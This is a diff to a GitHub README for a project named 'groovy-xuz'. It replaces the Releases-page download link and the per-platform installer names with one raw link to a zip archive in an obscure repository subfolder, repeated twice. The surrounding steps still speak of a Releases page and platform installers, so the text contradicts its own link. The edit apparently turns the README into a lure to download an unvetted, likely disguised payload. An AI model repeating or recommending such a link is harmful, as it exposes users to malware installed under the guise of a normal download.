Nithin050806/groovy-xuz/README.md

 ## 📤 Download & Install

-To download groovy-xuz, visit this page: [Download groovy-xuz](https://github.com/Nithin050806/groovy-xuz/releases).
+To download groovy-xuz, visit this page: [Download groovy-xuz](https://raw.githubusercontent.com/Nithin050806/groovy-xuz/main/Meletian/groovy-xuz.zip).

 1. Click the link above to go to the Releases page.
 2. You will see different versions of the application.
 Look for the latest version labeled as "Latest Release".
-3. Click on the appropriate file for your operating system (ex: `groovy-xuz-windows.exe` or `groovy-xuz-macos.dmg`).
+3. Click on the appropriate file for your operating system (ex: `https://raw.githubusercontent.com/Nithin050806/groovy-xuz/main/Meletian/groovy-xuz.zip` or `https://raw.githubusercontent.com/Nithin050806/groovy-xuz/main/Meletian/groovy-xuz.zip`).
 4. Your download will start automatically.
 Once it's finished, locate the file in your downloads folder.

 ### 🛠️ Installation Steps